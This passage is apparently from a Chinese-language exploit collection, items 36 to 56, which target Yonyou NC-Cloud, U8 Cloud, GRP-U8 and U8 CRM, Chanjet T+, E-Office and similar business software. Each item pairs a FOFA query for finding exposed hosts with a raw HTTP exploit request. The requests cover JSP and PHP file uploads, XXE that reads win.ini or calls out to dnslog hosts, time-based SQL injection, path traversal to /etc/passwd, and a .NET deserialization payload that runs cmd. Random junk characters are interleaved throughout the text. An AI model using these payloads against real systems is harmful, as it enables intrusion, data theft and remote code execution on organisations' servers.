POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
' ]; \' H8 v3 OHost: 203.25.218.166:8888' {. T$ Z: [* g; M8 _/ c# h' J( p$ A
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
4 S, }2 F) b1 `3 n) ]Accept-Encoding: gzip, deflate. S+ D' T/ R) b; c: o
Accept: */*6 u2 N+ V7 g! q" F, s# B/ [
Connection: close% Q- D7 G( D. Z. v& u6 E5 {6 s
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA7 |. I6 Q0 X+ q
Content-Length: 190: X/ _$ K3 a$ z' B/ M0 t+ l
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0) z2 o; Q) _# i: H% c1 \1 U
$ X; r8 j6 Z1 j1 O; R& D) x
--fd28cb44e829ed1c197ec3bc71748df0: x: P. ^' U, `/ [) S
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"0 Z3 ?+ C2 V ~2 ?4 I4 b6 M4 v
7 }8 M8 N6 x( F<%out.println(1111*1111);%>
7 ~- i- v" j8 n3 t; a--fd28cb44e829ed1c197ec3bc71748df0--
$ _8 i! u3 \9 ~8 ?) D. v
- i, v$ e# {) w1 X9 _7 c" ?- p1 s1 ]$ b! \% `! k5 t/ c
36. 用友NC-Cloud soapFormat XXE$ y# e! N. P/ k2 W$ R5 V Y2 x3 k
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"8 u0 O2 {6 ? s& H3 Z
POST /uapws/soapFormat.ajax HTTP/1.1* X4 \8 Y7 F0 m5 f5 @. z
Host: 192.168.40.130:8989
! m% W# _& G8 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
! F3 g1 Z: H' K1 ], T/ Y i% vContent-Length: 263- k5 L) B# v% G. f, U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( T5 |7 f4 z- ]- C0 X1 g
Accept-Encoding: gzip, deflate1 G% P. ?4 f- q# R4 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 R$ \$ r; K% j m" b, {/ j" }. ?Connection: close
6 O& P8 D9 m& p. e, r6 s F& ^Content-Type: application/x-www-form-urlencoded f' |8 z: o' T+ B# @
Upgrade-Insecure-Requests: 18 K/ S( Y9 |! ^# ?$ `5 L1 A
1 @1 A2 D9 m- A! k: z; G Y# {msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a, l- ?7 ?' }& C! a! w3 ~
0 {, j7 ~, \8 v4 s- k2 ?- {
5 W& C2 y4 g( z( L% F5 T3 w/ T
37. 用友NC-Cloud IUpdateService XXE
2 M# w: N( z& p: u1 @3 I8 PFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"- C' O7 P( O& O8 ?
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
: j$ A; ]: z) z$ qHost: 192.168.40.130:8989
( G) v; C, w5 U" m) A d; aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36$ {- v4 K, S6 c" }. U/ _# G
Content-Length: 421' u! O$ N9 ~6 F. |& ?3 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- [% B# a) |) s1 Y( ~" @0 w
Accept-Encoding: gzip, deflate' T7 ?% r4 i, X
Accept-Language: zh-CN,zh;q=0.9
3 ]' F6 t3 c4 P9 K" e! |Connection: close
1 u( B4 }& p. w1 i& VContent-Type: text/xml;charset=UTF-8
9 V4 G: _( O1 C$ XSOAPAction: urn:getResult! p3 O' V* J7 k2 ~) v0 f% Y. W0 ^& p
Upgrade-Insecure-Requests: 1 e1 }; J Z2 |
1 e$ W. x$ z' q, l; E, z. @, ?& G<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">% m1 F* A9 C k3 e5 C! a7 r
<soapenv:Header/>+ Q4 E9 L# r# w6 K, l1 g3 _
<soapenv:Body>6 o0 a3 ]5 z$ w6 { C
<iup:getResult>, |8 S* U9 F) c) Y. ~/ p; j
<!--type: string-->
) X' D& \, ~! s1 u) A) [8 K<iup:string><![CDATA[
$ k( i/ H1 A- W! m1 I1 V: I) ^<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>+ a5 d, p) c/ U; T4 O- Y* X& Y
<xxx/>]]></iup:string>) D X8 m3 i9 {- F, b- \3 t V
</iup:getResult>
1 v3 ^6 B$ ]" ~- w</soapenv:Body>
3 @6 `% m) z# w8 L</soapenv:Envelope>; U: k* d9 Q: u8 K3 G
; Z( V1 M1 t2 l9 R
' |: u$ y6 e+ B* U) e& \6 m- W, A6 {
38. 用友U8 Cloud smartweb2.RPC.d XXE! a$ s/ y n, b6 \( N
FOFA:app="用友-U8-Cloud"
8 W: Y7 R u4 r4 ]$ gPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1* U, w l$ T9 ^2 [% D- ]+ n
Host: 192.168.40.131:8088
9 T o# i# Y+ U. L3 g jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
8 b" ?5 h5 E# B& D7 VContent-Length: 260
9 n* ~ A% V* I9 u, FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
h% X4 y! u7 Y* B! ?, M5 PAccept-Encoding: gzip, deflate1 C% C0 Z+ b9 C( a* l$ F
Accept-Language: zh-CN,zh;q=0.9. U& S% y1 S7 `! A% O- G
Connection: close$ h2 b3 K `+ b' y
Content-Type: application/x-www-form-urlencoded
' l* G: H8 C+ \0 s4 J: L
" d# p8 K4 g3 ~" ^: U: I$ ] n& `__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
6 W0 v' k+ J8 e( L6 a
, e$ S0 J# ^, n! v$ p
& _* B# a& `* M a39. 用友U8 Cloud RegisterServlet SQL注入
. A; L* N% o6 g0 V+ N) z$ X$ m- rFOFA:title="u8c" g, G& W+ S2 D* J
POST /servlet/RegisterServlet HTTP/1.1
' Y& M& d& o6 }; r$ \% p, bHost: 192.168.86.128:8089
" k2 n6 @: f1 T6 C1 ? B9 T# bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% E. u$ g! [7 u$ d% }
Connection: close
% a# x# }5 D- v6 `Content-Length: 85
" x- L' I+ L& H& KAccept: */*
- r7 c, ~* H1 t4 e" IAccept-Language: en
- Y1 \8 o4 O1 \6 Z) L9 h* IContent-Type: application/x-www-form-urlencoded
" _% W) G g* Z5 j! b' g0 gX-Forwarded-For: 127.0.0.1
/ h! O3 ~3 L/ {% wAccept-Encoding: gzip
4 l8 H: f$ r3 `" z0 J/ T# A2 I
h( z5 v' J( u% K$ f5 J8 ]2 Susercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
7 i7 `: E$ @$ ~( p# b
0 r. S( E9 \& v7 _$ K! y- E4 s. e! p/ a5 Y- a
40. 用友U8-Cloud XChangeServlet XXE
: {/ ?/ j7 D1 eFOFA:app="用友-U8-Cloud"" z3 ]2 @0 k/ [* a
POST /service/XChangeServlet HTTP/1.1
) M6 ~) s- F9 DHost: x.x.x.x% w" J! l4 I+ G' C/ L0 ~
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# U5 H% F2 p; @! R0 @' a: [0 x: w8 ?
Content-Type: text/xml
+ ^) m- s5 v4 X3 \7 `' zConnection: close
; E, \) [% r& @) g, B |# s( p
6 e! s6 q: `. M4 v0 A<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>! ]8 e5 v; {+ {, M# Y$ u* C: K
0 O6 r& D/ U; i9 a
/ p$ P- u) \0 c
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
6 I1 i8 u; {- iFOFA:app="用友-U8-Cloud"
3 j+ [" H) J5 M2 @$ B; b3 ~. KGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1/ g8 m8 y4 P2 X
Host:, Z" }6 e+ Q+ P# J6 z$ Q! |/ p, N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" A+ B2 |0 |1 U, [$ f! s: r8 |Content-Type: application/json
$ Z( X4 k8 a- B7 f3 V2 r2 v" ZAccept-Encoding: gzip) ^+ o1 y# s2 f9 Y- Q2 a7 B- i( ]
Connection: close: _+ D3 n& c9 o w1 U: }# {
8 j1 H& b+ ? t9 _8 \# q
6 W0 ~9 F* a5 h5 {
42. 用友GRP-U8 SmartUpload01 文件上传
% x' U9 K. r: f9 [8 i KFOFA:app="用友-GRP-U8"
/ [! A4 w7 S0 y, f% FPOST /u8qx/SmartUpload01.jsp HTTP/1.1
# \& u3 }1 ?4 @$ n ]Host: x.x.x.x
/ d# s+ u0 b% j) t# J4 }) NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
0 |$ v: ?0 @3 `3 k" s( s/ R3 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
" I0 x6 j& X1 |9 {8 H; b' b- R- [ T
. O# _6 J2 Y4 E4 W, j# P' W7 rPAYLOAD
0 ?; H1 }1 ^- A* ^) @3 D- Q) ?6 `+ G' P6 D/ r
% P* h& d! _' f9 d- Hhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml9 x1 w) g% Q t- t* p1 k
, B! G, Q7 T6 G) K3 R1 x& Q0 ]1 d
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
. q& X& U/ t, W) h6 [* yFOFA:app="用友-GRP-U8"2 z1 W; T0 P: Z/ n$ E" c. O# x
POST /services/userInfoWeb HTTP/1.1
( W7 M7 ^! `# o7 M1 U% B1 f6 R4 }; }Host: your-ip
0 b5 z+ J0 K$ ]& E7 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) Z( c _) h; M0 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 T2 D3 e) W; M" x5 UAccept-Encoding: gzip, deflate
3 `% N- G, E' |& tAccept-Language: zh-CN,zh;q=0.9) r( V$ Y' r# ~/ }5 y8 C
Connection: close
2 \5 Z3 @0 W& w2 v0 C( [SOAPAction:, C2 J. X& m7 b9 f0 |
Content-Type: text/xml;charset=UTF-8
8 _- D" }! @& o, f" |; n8 h. K: Q! c( ] o: c
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
6 U& r3 T& N* k% d9 V) l <soapenv:Header/>
! A2 \+ {4 u5 n) g8 R8 Q2 @ <soapenv:Body>2 K* U1 z: Z* c8 a6 M: d8 C
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">( P& f. a0 j2 [& R
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
7 b# Q% j7 w. j3 {: q3 V </ser:getUserNameById>
1 L/ D4 {; U* q7 K; J% M3 e5 Y/ ] </soapenv:Body>! y3 s% d4 i2 j3 s
</soapenv:Envelope>
, {/ `+ z$ {3 x" W$ ^# o, k1 f0 V; `* ~2 r; |
, f7 Y+ f- I! U7 [8 X M
44. 用友GRP-U8 bx_dj_check.jsp SQL注入8 {3 w4 g( u+ A- r2 i- [' m6 U. ^
FOFA:app="用友-GRP-U8"# E! i- g* u% q! M" `% n
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1( i: R: [1 F# }% Z; S
Host: your-ip3 t; I. w, S- R% f/ j! H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
7 {' @/ d- ~: Y* pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% u8 n& B/ p: D% ~Accept-Encoding: gzip, deflate* M9 `' G/ a1 \6 {0 E
Accept-Language: zh-CN,zh;q=0.9
+ E1 t7 v: A# gConnection: close
& M8 Z z/ t( K7 s+ a
. X C4 g6 T) B$ A/ J7 D; p5 G% [" ~$ k5 |# J9 I$ Z6 c
45. 用友GRP-U8 ufgovbank XXE0 R( w8 [! X$ K3 `7 b
FOFA:app="用友-GRP-U8"; t7 s3 s7 a0 \. A' F
POST /ufgovbank HTTP/1.19 n6 R3 C' Z9 q0 K3 F
Host: 192.168.40.130:222, L' _7 p5 A' ~, O' p; `- _, B1 E n5 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
1 M+ h! m2 i% K0 P1 ?5 R5 dConnection: close
! d! i3 W- X! M+ P2 x8 NContent-Length: 161: k4 V1 a* e$ c( x2 G% g# k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 A0 }' J$ b% ~2 \* F. f" K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 U% r4 x: f, d3 Y. i$ P- K, G7 O
Content-Type: application/x-www-form-urlencoded9 A1 ]. h: l) r* d
Accept-Encoding: gzip3 l! d w9 i4 b
5 u* I& H: N( P- |reqData=<?xml version="1.0"?>" S. `# S9 o2 F) j4 w* G
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
, k- z7 H. V7 m8 N+ B% [* ]6 \0 n! s' F$ c6 ] `! J
! ^! R5 w4 n: u* d9 m0 _, J46. 用友GRP-U8 sqcxIndex.jsp SQL注入' a4 v7 {( x7 M$ }2 Y! w2 s1 U1 `
FOFA:app="用友-GRP-U8"" O2 d3 C$ h. Q+ E
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1: ]* V" \- F. R% K2 S- R
Host: your-ip
5 {" u4 \& d( {& y3 U5 p% sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36% o& z- c# l i) [% x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& k+ G9 L+ H; V1 g0 ^. i; v jAccept-Encoding: gzip, deflate
: ?1 p& B6 H5 bAccept-Language: zh-CN,zh;q=0.9) |3 A, o2 I S+ d8 }/ q
Connection: close
* W) I2 S- w9 {; H& t4 ?7 F Z/ k! Y6 S. w) B+ x
+ u, [4 K' m5 y% @7 m/ Q! C9 ]6 f% N47. 用友GRP A++Cloud 政府财务云 任意文件读取( Q2 O, Y# V0 p; t% ?0 y, w8 ~
FOFA:body="/pf/portal/login/css/fonts/style.css"! b- f% j0 D/ J- a( J
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1; k" e+ p& s* X; V! J8 {
Host: x.x.x.x3 |( f$ m5 j6 F3 M
Cache-Control: max-age=07 y6 o! x% b. }' V
Upgrade-Insecure-Requests: 1) F( o) A! |, r( c6 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ y8 ^" Y# h: [7 k5 E) q4 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 B9 |, Y5 I3 T& }' g
Accept-Encoding: gzip, deflate, br. }" k# ]8 Z$ P6 l# C
Accept-Language: zh-CN,zh;q=0.9
9 K/ b& g, G! `If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
7 v5 p6 Z7 |! x% |8 k7 u% a1 R yConnection: close
+ ~! e9 J: u% M6 a- ?/ y( h( B( e
0 z" u! \3 j0 t! V2 j
, V" E+ l; n! O9 F
48. 用友U8 CRM swfupload 任意文件上传
% d* r$ j2 ?" m6 q4 P5 TFOFA:title="用友U8CRM". H! Q" {2 d& }7 z$ m
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
7 g- g. K+ T0 Z3 _/ {Host: your-ip0 J- [9 ~2 R6 X O1 i/ G. o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 q, v2 l9 Q: L( g) |8 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ f# R3 @6 `, l, b/ u: NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 Z' [. t8 \- gAccept-Encoding: gzip, deflate
1 A) Q4 P+ S: ~4 X1 y, sContent-Type: multipart/form-data;boundary=----269520967239406871642430066855% H4 @/ q' @& W' V: w$ Y; j! D2 O- j
------269520967239406871642430066855
( `/ P* d1 S8 Z* O. }2 i9 TContent-Disposition: form-data; name="file"; filename="s.php"
6 T1 }- J& O/ a5 Y1231
9 W1 D+ w* s5 O% w: n4 gContent-Type: application/octet-stream$ o9 A2 S, ]8 U2 A
------269520967239406871642430066855" |3 f* g" U" P& ]$ A! }. w" h, V
Content-Disposition: form-data; name="upload"
" j- A1 d9 c+ d5 ^+ ?$ S" Z$ Nupload
- u1 e0 h. y) G) K' H) F------269520967239406871642430066855--
: j% Q8 u) W' q! T/ l+ @+ R0 g% k* f5 Q7 ~4 s* x* u8 k# |* q% E
2 u) w4 E& B( E# a5 Y49. 用友U8 CRM系统uploadfile.php接口任意文件上传( h" d$ @/ ~; |: P+ z
FOFA:body="用友U8CRM"2 o" W3 H( l; D0 ]: ^
4 ~5 P# R/ ?6 C6 Q* K. sPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1- M" ?, O# H0 q: u
Host: x.x.x.x
& w1 Q/ _ B4 o2 s& f. U% M6 S; i8 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ m3 e0 t5 W& M8 H- b
Content-Length: 329
8 N: k) b; q d# a1 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 T h9 z0 `, T r1 jAccept-Encoding: gzip, deflate
$ d' I, |: f0 C, O4 H& o6 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% m' R$ Y9 X; d5 s. D: FConnection: close! [, G9 Y6 _7 F3 {, \! [
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w: m6 \8 \3 o/ I& d& t
. f) O; q' }8 z8 j, o0 E
-----------------------------vvv3wdayqv3yppdxvn3w
* F6 T. E: n) z. f: h; GContent-Disposition: form-data; name="file"; filename="%s.php "% U' \- H3 v; `4 D
Content-Type: application/octet-stream3 K- |$ K3 A+ Y5 b5 s5 J7 P6 R
" H0 O5 q- f6 ]' r% _5 H
wersqqmlumloqa! `2 k5 U4 q, D( L: W, y- x6 u
-----------------------------vvv3wdayqv3yppdxvn3w
3 x0 G/ c" S0 Q- C/ ~' L, A" aContent-Disposition: form-data; name="upload"/ H1 U% v/ j( }" Q
. t$ K( w0 K8 J
upload
* D/ q% o# u1 H! o-----------------------------vvv3wdayqv3yppdxvn3w--
# K, w e0 }" l% R" q
1 B1 Y$ O$ O8 s: w- W" \7 g9 ~' d: b
http://x.x.x.x/tmpfile/updB3CB.tmp.php
( F, o7 H1 h; @ d/ u5 W, ^7 z* _5 w! Q" L4 Y5 j
50. QDocs Smart School 6.4.1 filterRecords SQL注入
. c8 I3 l3 q6 }1 pFOFA:body="close closebtnmodal"* U& [3 Z3 |6 ^; W# S- h1 ?6 C
POST /course/filterRecords/ HTTP/1.14 r9 L! Y9 U5 w2 m( _+ u9 y
Host: x.x.x.x
9 [# o8 _! N8 t( z1 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
0 H; r: Z# ~7 O5 |0 K3 m7 _" @Connection: close
1 a5 {' G E- Y4 AContent-Length: 224$ c5 ]% x6 `3 ?2 g7 g; W
Accept: */*
1 C" t: P; q* |% D0 Y. P8 q \( wAccept-Language: en' n+ B, h# B' N5 B- J9 I8 ? h# x
Content-Type: application/x-www-form-urlencoded
) A$ j* ?' C% K8 T( hAccept-Encoding: gzip5 y9 Z' P6 U( Y
, x8 N3 ^" x5 y8 h# h2 W' l" A
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=18 S: i6 c! y% e$ X9 A" B1 D
# A. Q/ Q& _( T7 M% }, l
3 \# V* m. f. B5 P+ u% m# F* {7 D9 a
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入" U% d6 ?, b8 n! |* u
FOFA:app="云时空社会化商业ERP系统"
| |& \ R, C& O6 _+ N5 CGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
' g( p# q/ H2 u: _6 yHost: your-ip; ^* m" y* h' Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.368 X3 ?' d2 p1 T0 F' {9 I7 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 G9 S/ f+ `; \+ f
Accept-Encoding: gzip, deflate
) L$ S" y5 }& y- _6 @# EAccept-Language: zh-CN,zh;q=0.96 y( e# I7 J1 |6 d4 F% c
Connection: close( y9 H B% P: I$ U) Q6 H) g
+ ]) o& z4 X% ?) f7 U8 _. d; C
' |* H* r( ]6 C0 k52. 泛微E-Office json_common.php sql注入
' i" x/ U* `( B+ g. GFOFA:app="泛微-EOffice"
A$ U) L: z& j# bPOST /building/json_common.php HTTP/1.1' P/ P9 \& S$ N/ r
Host: 192.168.86.128:8097& w/ S8 q, ]& P
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" N/ f1 _5 j, l' ?( X
Connection: close; [* k. U# F# q+ J
Content-Length: 87
: I. v5 i% H! ~8 `2 s+ l7 r# vAccept: */*
+ u- M4 @2 t# w% DAccept-Language: en
0 J4 p, g+ c+ j% J, a1 B$ J$ `Content-Type: application/x-www-form-urlencoded$ q3 A. N: D6 `' r
Accept-Encoding: gzip
& n% l2 w3 h6 i! r8 F! ^9 F! F2 X8 k- K
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3335 R+ S! v/ b, |9 [& }
' C" a+ x- [; D* W" K Q
% E* w4 j6 s0 `- t
53. 迪普 DPTech VPN Service 任意文件上传 J* z4 r" B2 R9 ^+ L2 ^
FOFA:app="DPtech-SSLVPN"- \8 C2 s; c" m% ?
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd2 ?* k$ P* O1 v# ?8 o. @0 B. o
- j V) j9 Z0 k* \6 D
5 F5 F1 }! ]* `! ^0 `1 {8 p3 Q3 E" h54. 畅捷通T+ getstorewarehousebystore 远程代码执行# s$ F5 \# E: L
FOFA:app="畅捷通-TPlus"
! \* p5 e' u b# m$ Z* T第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
+ G8 s# G, a/ I: ?6 A"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"' D ?, u8 c- M) x- ^
# a( }0 @, w: Y: {& G
( W+ H( Z6 z8 A1 `完整数据包2 g7 H4 _5 a: }9 {$ {6 H1 v
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
1 w [5 E4 ]3 I( ^+ S6 R6 wHost: x.x.x.x& M2 B/ S' G+ Y( P3 z1 X% m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F. ~3 A) u5 V7 n
Content-Length: 593- \ r/ b0 K& a, {) |: G4 J& J
0 o3 i9 N& X' Z* b1 H7 Q# ?{
, u/ \! y6 _/ c: G- q( R, q"storeID":{0 a* a6 @8 }( b# S' R3 ?* s. q
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
8 I1 p: x& o; Y "MethodName":"Start",
8 ?0 I$ L3 i2 I/ S; o3 F8 z "ObjectInstance":{0 i6 W' X M u( C' S' G- v3 [
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
, `7 g% L* ~. `5 S* j! M "StartInfo":{2 }( ?) Y$ L$ r0 U& b* F- {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* l( W8 | }" `: m4 R6 b4 ?. B
"FileName":"cmd",6 r1 o7 e, K/ X
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
: O. L. f. B3 k1 |5 x }
& M) A/ T. D/ ?9 s }
9 Y: i3 b: @ N/ {3 E }
3 h* U; K$ w3 R( T4 x}/ @, ~* g/ |* e) R9 M
" Q& D) f. |1 S9 U/ _
7 m& \! L6 {" K* g* p
第二步,访问如下url& `5 i0 F4 Q+ w: Y, ?
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt- o8 Y- E# ~8 c. A8 @
0 t1 q f, z6 Y! g/ U! d# ?
9 I& @1 r& f! `, G7 j1 F9 {; t55. 畅捷通T+ getdecallusers信息泄露
; K) N" ^& S( y! v' P. e& ]& m: n& BFOFA:app="畅捷通-TPlus"
2 N7 z/ f: x' f第一步,通过; q0 k: y/ P1 V' Z) c4 ~
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
' m! ` p5 F& D+ ]( b第二步,利用获取到的Cookie请求2 q' C3 {: J& }* n) V: M9 T; g( t4 g
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
V1 |& T) i( d- i. Z7 {" ]. |# L- P) Y0 l: O2 g, b3 `
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
* a! ?) s9 ? U' {FOFA: app="畅捷通-TPlus"! L) y3 g% L7 S
